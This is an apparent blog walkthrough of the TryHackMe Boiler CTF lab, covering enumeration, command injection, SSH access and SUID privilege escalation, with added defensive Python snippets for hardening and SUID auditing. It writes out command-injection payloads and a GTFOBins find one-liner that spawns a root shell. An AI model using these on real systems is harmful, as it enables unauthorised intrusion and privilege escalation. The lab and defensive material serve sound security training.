June 2, 2026
TryHackMe Boiler CTF Walkthrough: Complete Enumeration, Exploitation & Privilege Escalation Guide
Hello everyone!
Dharmendrakumar
In this walkthrough, we'll solve the Boiler CTF room on TryHackMe by performing enumeration, exploitation, and privilege escalation to obtain root access.
Lab environment
Target IP address: 10.49.181.62
Objective: Enumerate services on the target, capture two flags, and complete the escalation path.
Note: Make sure you are connected to the TryHackMe VPN before starting the challenge.
Common Tools
- Nmap
- Dirb
- Cyberchef
- GTFOBins
Step 1: Verify that the target machine is reachable.
Command:
ping -c 4 10.49.181.62
Step 2: Run an Nmap scan of all ports to identify open ports and detect the running services and their versions on the target machine.
Command:
sudo nmap -sC -sV -p- 10.49.181.62
Step 3: In this step, we discovered that the FTP service is running and allows anonymous authentication. Since anonymous login is enabled, we can connect to the FTP server without valid user credentials and explore the available files and directories for further information gathering.
ftp 10.49.181.62 21
ls -la
get .info.txt
It looks like the text is encoded with ROT13. Let's decode it and see what it reveals.
Step 4: Browse to the web server running on port 80.
URL: http://10.49.181.62/
Step 5: After exploring the webpages, if nothing noteworthy is found, proceed to perform directory brute-forcing using a tool like dirb.
Step 6: During directory enumeration with dirb, I discovered the _test directory and decided to investigate it further. We also need to manually enumerate the CMS to discover additional directories and hidden resources.
Inside _test, a URL parameter turned out to be vulnerable to command injection, so we could use it to inject and execute our own commands.
;ls
Now, we can use cat log.txt to view the contents of the file.
;cat log.txt
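The root cause of this finding is a handler that splices a request parameter into a shell command line. The write-up does not show the CMS source, so the snippet below is an added example of my own, not the room's code: a hypothetical "reach a host" handler written the injectable way next to the hardened way, with a tokenizer that shows what the shell would actually see for the ;ls payload used above. The parameter name and the ping command are assumptions.

```python
"""Added example (not the room's CMS code, which the write-up does not show):
an injectable 'ping a host' handler beside its hardened form, plus a helper
that shows why the injectable one breaks. Nothing here executes a command.
"""
import ipaddress
import re
import shlex

# RFC 1123 style hostname: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    r'(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
)


def vulnerable_command(target: str) -> str:
    """The injectable pattern: the request parameter is concatenated into a
    single string that would then be handed to a shell (shell=True/os.system).
    'ping' is an assumed command; the write-up does not name the real one."""
    return "ping -c 1 " + target


def shell_tokens(command: str) -> list[str]:
    """Split a command line the way a POSIX shell would, with ; | & < > ( )
    emitted as their own tokens. Used only to show what the shell would see."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def is_valid_target(target: str) -> bool:
    """Allowlist check: accept only an IP literal or a syntactically valid
    hostname. Everything else, including values starting with '-', is rejected
    so the input can neither add a command nor add an option."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(target) is not None


def hardened_argv(target: str) -> list[str]:
    """The safe pattern: validate first, then build an argv list meant for
    subprocess.run(argv) with shell=False. The value becomes exactly one
    argument, so shell metacharacters in it have no special meaning."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return ["ping", "-c", "1", target]


if __name__ == "__main__":
    payload = ";ls"   # the same injection string used in the walkthrough
    print("vulnerable handler hands the shell:", shell_tokens(vulnerable_command(payload)))
    print("hardened handler builds:", hardened_argv("10.49.181.62"))
    try:
        hardened_argv(payload)
    except ValueError as exc:
        print("hardened handler:", exc)
```

Two things matter in the hardened version: validation against an allowlist (what a host *may* look like) rather than a denylist of bad characters, and passing the value as its own argv element so it never reaches a shell parser at all. Either alone leaves gaps; together they remove the injection class rather than one payload.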
Step 7: The information gathered during enumeration revealed credentials for the user basterd, allowing SSH access.
Command:
ssh -p 55007 basterd@10.49.181.62
After gaining access, I discovered a script named backup.sh. Examining its contents revealed information useful for lateral movement.
su stoner
ls -al
cat .secret
Step 8: Now we have to escalate privileges to get the root flag.
To identify potential privilege escalation vectors, I searched for SUID binaries.
Command:
find / -perm -4000 2>/dev/null
Now we will use GTFOBins to find a command for escalating to the root user.
Executing the following GTFOBins technique spawned a root shell, giving us full administrative access to the machine.
/usr/bin/find . -exec /bin/sh -p \; -quit
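The find command above lists every SUID file; the question a defender has to answer on a real host is which of them should not be there. The following is an added example, not part of the original walkthrough: it walks the filesystem without following symlinks, splits the SUID files it finds into expected and unexpected ones against an allowlist, and flags any SUID binary that is group- or world-writable. The allowlist is an assumption for this example and should be replaced by the baseline of the image you actually deploy.

```python
"""Added example (not from the original walkthrough): audit SUID binaries
against an allowlist of the ones a host is expected to carry.

EXPECTED_SUID is an assumed baseline, not data from the room.
"""
import os
import stat
import tempfile
from pathlib import Path

# Assumed baseline: SUID binaries a typical Debian/Ubuntu host legitimately has.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec",
}


def is_setuid(path: Path) -> bool:
    """True if `path` is a regular file with the SUID bit. Symlinks are not
    followed, and unreadable or vanished entries count as not SUID."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid(root: Path) -> list[str]:
    """Walk `root` (no symlink following) and return the sorted absolute paths
    of every regular file with the SUID bit set; the Python counterpart of
    find / -perm -4000."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        # Pseudo-filesystems never hold real binaries; prune them in place.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            p = Path(dirpath) / name
            if is_setuid(p):
                found.append(str(p))
    return sorted(found)


def audit_suid(paths: list[str], expected=EXPECTED_SUID) -> dict[str, list[str]]:
    """Classify SUID files: 'expected' if on the allowlist, 'unexpected'
    otherwise, and 'writable' (in addition) if group- or world-writable, which
    would let a non-root user replace the contents of a privileged binary."""
    report = {"expected": [], "unexpected": [], "writable": []}
    for p in paths:
        bucket = "expected" if p in expected else "unexpected"
        report[bucket].append(p)
        try:
            mode = os.lstat(p).st_mode
        except OSError:
            continue
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            report["writable"].append(p)
    return report


def demo_in_tempdir() -> dict[str, list[str]]:
    """Exercise the audit on a throwaway tree (one SUID file, one ordinary
    file) so it can be run without touching the real system."""
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir = Path(tmp) / "bin"
        bin_dir.mkdir()
        suid_file, plain_file = bin_dir / "find", bin_dir / "ls"
        suid_file.write_bytes(b"#!/bin/sh\n")
        plain_file.write_bytes(b"#!/bin/sh\n")
        os.chmod(suid_file, 0o4755)   # SUID + rwxr-xr-x: should be flagged
        os.chmod(plain_file, 0o755)   # no SUID: should be ignored
        return audit_suid(find_suid(Path(tmp)))


if __name__ == "__main__":
    report = audit_suid(find_suid(Path("/")))
    for p in report["unexpected"]:
        print("unexpected SUID:", p)
    for p in report["writable"]:
        print("writable SUID:", p)
```

Run as root on a host and diff the "unexpected" list against a known-good build; a SUID bit on a general-purpose binary such as find is exactly the kind of entry that should never pass that review.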
In this room, we performed service enumeration, leveraged anonymous FTP access, identified a command injection vulnerability, gained SSH access as a low-privileged user, and finally exploited a misconfigured SUID binary to obtain root privileges. This challenge highlights the importance of proper service configuration, secure credential management, and privilege separation.
Thanks for reading! I hope you found this walkthrough helpful. Feel free to connect with me for more cybersecurity content and TryHackMe writeups.